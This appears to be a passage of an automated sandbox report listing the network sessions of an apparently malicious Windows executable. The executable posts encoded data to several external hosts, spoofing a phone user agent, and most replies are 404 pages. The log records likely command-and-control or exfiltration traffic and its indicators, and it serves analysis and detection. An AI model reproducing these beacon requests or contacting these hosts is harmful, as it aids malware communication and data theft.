                    Data Raw: 36 58 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 62 39 2b 37 47 62 75 4f 50 70 7a 64 47 31 6f 49 6f 7a 74 42 41 61 78 47 6d 55 34 4f 69 75 32 6c 59 4b 5a 46 70 4f 33 57 62 35 66 73 46 6c 37 54 76 2f 36 38 39 64 35 33 6f 44 78 2f 51 65 7a 35 71 41 31 70 7a 35 44 67 4f 6c 65 7a 55 45 58 5a 4a 2f 76 65 37 6a 33 35 48 64 64 45 33 31 4c 55 36 2b 71 57 5a 34 4e 73 50 37 41 5a 35 36 57 34 77 38 41 6c 4b 36 67 43 44 4a 50 73 53 2b 59 73 6b 51 72 42 4d 2b 4b 4d 47 54 43 33 6e 71 66 63 62 4f 79 58 6e 52 50 64 31 52 76 6a 59 73 36 41 45 76 64 33 2b 34 54 54 71 41 52 75 55 65 54 38 78 6b 4e 74 4e 77 3d 3d
                    Data Ascii: 6X=n9Z7p+EBOElJb9+7GbuOPpzdG1oIoztBAaxGmU4Oiu2lYKZFpO3Wb5fsFl7Tv/689d53oDx/Qez5qA1pz5DgOlezUEXZJ/ve7j35HddE31LU6+qWZ4NsP7AZ56W4w8AlK6gCDJPsS+YskQrBM+KMGTC3nqfcbOyXnRPd1RvjYs6AEvd3+4TTqARuUeT8xkNtNw==
                    Sep 22, 2024 17:40:49.471364021 CEST  312                IN         HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:49 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    10          192.168.2.4  49747        154.23.184.240  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:40:51.107100010 CEST  747                OUT        POST /edpl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.hm62t.top/edpl/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 53 6c 5a 72 70 46 6f 4d 50 57 63 35 66 73 4f 46 37 57 77 76 36 69 39 63 46 2f 6f 47 52 2f 51 65 6e 35 71 42 46 70 79 4b 37 2f 63 6c 65 78 63 6b 58 62 57 76 76 65 37 6a 33 35 48 64 49 72 33 31 6a 55 36 50 61 57 49 71 6c 76 46 62 41 61 36 36 57 34 30 38 41 35 4b 36 67 77 44 4d 71 4a 53 39 67 73 6b 52 62 42 4d 76 4b 50 66 44 43 78 6f 4b 65 66 66 4e 6a 53 72 45 33 64 38 43 4c 36 66 2b 2b 6b 49 4a 4d 74 76 4a 79 45 34 41 31 64 4a 5a 61 49 38 6e 77 6b 57 78 61 76 76 35 5a 56 4e 70 41 4b 72 52 53 67 6b 41 63 6d 55 31 49 3d
                    Data Ascii: 6X=n9Z7p+EBOElJacO7E42OJJzcIVoI+DtFAa9GmWUehcSlZrpFoMPWc5fsOF7Wwv6i9cF/oGR/Qen5qBFpyK7/clexckXbWvve7j35HdIr31jU6PaWIqlvFbAa66W408A5K6gwDMqJS9gskRbBMvKPfDCxoKeffNjSrE3d8CL6f++kIJMtvJyE4A1dJZaI8nwkWxavv5ZVNpAKrRSgkAcmU1I=
                    Sep 22, 2024 17:40:52.028733015 CEST  312                IN         HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:51 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    11          192.168.2.4  49748        154.23.184.240  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:40:53.679172039 CEST  10829              OUT        POST /edpl/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.hm62t.top
                    Origin: http://www.hm62t.top
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.hm62t.top/edpl/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 6e 39 5a 37 70 2b 45 42 4f 45 6c 4a 61 63 4f 37 45 34 32 4f 4a 4a 7a 63 49 56 6f 49 2b 44 74 46 41 61 39 47 6d 57 55 65 68 63 61 6c 59 64 39 46 6f 72 62 57 64 35 66 73 53 31 37 58 77 76 37 6e 39 64 74 46 6f 47 55 43 51 64 66 35 70 6a 4e 70 36 62 37 2f 57 6c 65 78 65 6b 58 59 4a 2f 75 65 37 6a 47 77 48 64 59 72 33 31 6a 55 36 4e 43 57 59 49 4e 76 57 4c 41 5a 35 36 57 4b 77 38 41 64 4b 36 34 67 44 4e 72 38 53 4e 41 73 6c 78 4c 42 4b 64 53 50 58 44 43 7a 76 4b 65 39 66 4e 76 5a 72 45 43 6d 38 44 76 41 66 38 69 6b 59 66 78 7a 2f 4d 53 6b 37 54 68 43 62 65 36 66 37 6e 73 61 4e 78 75 74 2f 70 5a 61 58 36 4d 62 6d 42 48 56 79 46 78 6e 4b 69 78 67 66 4c 6e 46 76 67 41 59 74 73 2b 47 4e 68 41 71 49 38 38 33 4b 56 6e 64 37 77 6e 30 62 69 42 37 30 67 78 66 6a 78 59 6d 31 74 78 75 57 58 4c 61 4e 53 56 41 41 64 76 74 6f 5a 34 54 6c 6d 7a 47 4a 39 76 66 79 4c 39 35 61 74 33 6e 47 41 4d 79 76 4e 4c 6f 72 32 58 4e 53 61 78 34 4d 43 51 43 4b 75 38 6b 39 41 41 53 74 44 74 77 66 68 64 71 6e 59 59 49 6e 64 37 [TRUNCATED]
                    Data Ascii: 6X=... [TRUNCATED]
                    Sep 22, 2024 17:40:54.628940105 CEST  312                IN         HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:54 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    12          192.168.2.4  49749        154.23.184.240  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:40:56.233649969 CEST  479                OUT        GET /edpl/?6X=q/xbqOJEbFxqZdP5Pq3VIJihKFYuoTJpC6d7rXUvusGBValkv/SoX8DUGkqJst/hxOtwmyY8Q6nb8zkY9ZrFeAmdQleBPpTMkSiDA6E42mjQ0ujKW4BvX8M=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.hm62t.top
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:40:57.181016922 CEST  312                IN         HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Sun, 22 Sep 2024 15:40:57 GMT
                    Content-Type: text/html
                    Content-Length: 148
                    Connection: close
                    ETag: "66a8e223-94"
                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    13          192.168.2.4  49750        47.104.180.139  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:03.006192923 CEST  742                OUT        POST /6m23/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.zhuoyueapp.top
                    Origin: http://www.zhuoyueapp.top
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.zhuoyueapp.top/6m23/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 30 69 71 64 54 75 73 4e 5a 33 67 6d 64 43 58 46 41 52 31 61 79 33 4b 66 6f 32 6c 70 70 6a 76 7a 6c 6e 72 51 6d 4c 41 46 61 48 69 72 54 5a 4d 38 67 63 6a 49 53 4d 32 43 62 70 51 6e 4f 37 4b 76 64 50 6b 67 4a 67 63 52 2f 37 54 37 2f 50 4b 35 68 2b 76 43 6c 4f 6f 6f 6a 2f 79 4d 2f 36 4e 38 62 5a 32 6f 71 66 76 56 6e 2b 67 4a 49 58 57 76 61 6b 54 43 68 68 72 58 36 34 6f 49 57 4a 69 75 4d 54 2b 7a 55 54 48 46 77 6b 52 4f 52 55 39 67 42 4e 58 57 4b 59 67 72 49 55 77 4a 5a 59 44 6c 4a 4c 39 76 37 30 69 2f 68 46 55 74 30 63 43 77 4f 4e 6b 52 51 3d 3d
                    Data Ascii: 6X=8PnebwmJafIpD0iqdTusNZ3gmdCXFAR1ay3Kfo2lppjvzlnrQmLAFaHirTZM8gcjISM2CbpQnO7KvdPkgJgcR/7T7/PK5h+vClOooj/yM/6N8bZ2oqfvVn+gJIXWvakTChhrX64oIWJiuMT+zUTHFwkRORU9gBNXWKYgrIUwJZYDlJL9v70i/hFUt0cCwONkRQ==
                    Sep 22, 2024 17:41:04.175784111 CEST  545                IN         HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:41:04 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                    Strict-Transport-Security: max-age=3153600000; includeSubDomains
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    14          192.168.2.4  49751        47.104.180.139  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:05.563085079 CEST  762                OUT        POST /6m23/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.zhuoyueapp.top
                    Origin: http://www.zhuoyueapp.top
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.zhuoyueapp.top/6m23/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 48 76 79 45 58 72 52 6a 2f 41 43 61 48 69 79 6a 5a 51 68 77 63 65 49 53 78 44 43 61 46 51 6e 4f 76 4b 76 66 58 6b 67 61 34 62 44 2f 37 52 7a 66 50 49 6b 78 2b 76 43 6c 4f 6f 6f 69 61 66 4d 2f 79 4e 39 6f 42 32 36 59 33 6f 5a 48 2b 6e 4f 49 58 57 6b 36 6b 66 43 68 68 4e 58 34 63 43 49 55 42 69 75 4e 6a 2b 7a 41 48 45 51 67 6b 58 41 78 56 6c 67 42 4d 63 54 2f 31 4a 74 72 45 55 4b 35 42 75 67 50 61 6e 2b 4b 56 31 74 68 68 6e 77 7a 56 32 39 4e 77 74 4b 62 64 78 46 6b 72 6b 66 62 6c 68 48 70 69 42 55 31 47 6f 66 55 30 3d
                    Data Ascii: 6X=8PnebwmJafIpDXqqRUSsL53nq9CXfwRxay7KfsOTp7HvyEXrRj/ACaHiyjZQhwceISxDCaFQnOvKvfXkga4bD/7RzfPIkx+vClOooiafM/yN9oB26Y3oZH+nOIXWk6kfChhNX4cCIUBiuNj+zAHEQgkXAxVlgBMcT/1JtrEUK5BugPan+KV1thhnwzV29NwtKbdxFkrkfblhHpiBU1GofU0=
                    Sep 22, 2024 17:41:06.673520088 CEST  545                IN         HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:41:06 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                    Strict-Transport-Security: max-age=3153600000; includeSubDomains
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    15          192.168.2.4  49752        47.104.180.139  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:08.108371019 CEST  10844              OUT        POST /6m23/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.zhuoyueapp.top
                    Origin: http://www.zhuoyueapp.top
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.zhuoyueapp.top/6m23/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 50 76 7a 32 76 72 65 67 58 41 44 61 48 69 74 54 5a 41 68 77 63 50 49 53 5a 48 43 61 5a 71 6e 4d 58 4b 75 38 66 6b 31 62 34 62 5a 76 37 52 2f 2f 50 4a 35 68 2b 36 43 6c 65 73 6f 69 4b 66 4d 2f 79 4e 39 71 31 32 34 4b 66 6f 66 48 2b 67 4a 49 57 5a 76 61 6b 7a 43 68 35 7a 58 34 59 34 49 6b 68 69 74 74 7a 2b 77 31 54 45 52 41 6b 56 44 78 56 32 67 42 41 54 54 37 56 6a 74 6f 59 71 4b 37 64 75 73 71 75 35 6d 6f 5a 6f 33 41 68 43 69 69 74 2b 79 2f 49 47 54 4a 42 46 4c 31 37 64 4a 5a 74 79 64 37 33 51 4c 33 57 58 4b 55 32 7a 46 52 62 4d 42 43 6a 75 44 36 32 31 77 65 76 58 33 46 45 6d 33 47 79 70 46 78 49 78 68 44 5a 6a 41 4b 38 74 48 71 48 42 72 41 55 72 79 55 68 68 71 45 63 32 4f 4f 51 43 46 74 31 6e 69 41 36 36 6f 79 65 6f 6d 43 35 43 61 66 6c 69 71 4e 2b 78 62 4d 30 50 6f 51 52 48 5a 36 4d 33 30 6f 64 47 32 71 79 4c 73 71 75 7a 4d 6a 72 4a 32 42 7a 7a 49 49 54 42 6d 69 35 [TRUNCATED]
                    Data Ascii: 6X=... [TRUNCATED]


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    16          192.168.2.4  49753        47.104.180.139  80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:10.658143997 CEST  484                OUT        GET /6m23/?6X=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.zhuoyueapp.top
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:41:11.892486095 CEST  545                IN         HTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:41:11 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                    Strict-Transport-Security: max-age=3153600000; includeSubDomains
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    17          192.168.2.4  49754        3.33.130.190    80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:25.057770967 CEST  751                OUT        POST /7d10/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.autonashville.com
                    Origin: http://www.autonashville.com
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.autonashville.com/7d10/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 56 52 38 79 76 50 34 2f 78 4d 6c 36 39 52 59 69 4d 61 7a 62 6d 4f 62 73 43 75 48 4f 36 51 55 47 2f 45 4a 52 56 5a 79 62 4b 2b 76 76 32 6c 30 73 70 77 57 72 6e 6b 58 32 72 53 6a 72 42 4c 34 4d 79 62 6b 59 74 7a 2b 77 31 39 75 54 44 62 7a 59 62 79 45 37 52 68 7a 4a 4d 32 2f 45 6a 33 63 4e 78 48 4e 65 69 41 47 4a 52 56 71 38 48 6f 62 72 2f 5a 63 70 59 71 79 50 44 2f 61 35 55 55 56 31 66 4d 63 4d 71 55 67 62 66 37 39 2f 67 31 36 64 77 49 54 4b 74 73 34 68 31 77 49 52 47 38 79 2b 77 66 6a 78 46 48 79 43 58 50 52 7a 79 4f 33 6b 4c 70 71 39 52 41 3d 3d
                    Data Ascii: 6X=8kguG0/ZDb87VR8yvP4/xMl69RYiMazbmObsCuHO6QUG/EJRVZybK+vv2l0spwWrnkX2rSjrBL4MybkYtz+w19uTDbzYbyE7RhzJM2/Ej3cNxHNeiAGJRVq8Hobr/ZcpYqyPD/a5UUV1fMcMqUgbf79/g16dwITKts4h1wIRG8y+wfjxFHyCXPRzyO3kLpq9RA==


                    Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                    18          192.168.2.4  49755        3.33.130.190    80                5924  C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    Timestamp                             Bytes transferred  Direction  Data
                    Sep 22, 2024 17:41:27.610074997 CEST  771                OUT        POST /7d10/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.autonashville.com
                    Origin: http://www.autonashville.com
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.autonashville.com/7d10/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 77 47 78 41 46 52 55 64 6d 62 4a 2b 76 76 78 56 31 6f 6b 51 58 6c 6e 6b 61 4c 72 54 66 72 42 50 51 4d 79 62 55 59 73 41 57 7a 30 74 75 52 4d 37 7a 61 56 53 45 37 52 68 7a 4a 4d 32 62 69 6a 33 45 4e 78 32 39 65 6a 6c 79 4b 59 31 71 2f 4e 49 62 72 31 35 63 6c 59 71 79 39 44 2b 48 53 55 58 74 31 66 4e 73 4d 70 46 67 59 56 37 39 31 76 56 37 51 68 39 69 7a 6f 4a 52 51 2f 41 63 59 42 63 32 59 34 35 79 72 55 32 54 56 46 50 31 41 76 4a 2b 51 47 71 58 30 4b 44 78 6b 52 66 52 48 4c 79 54 44 66 65 56 6f 46 42 78 45 41 4d 77 3d
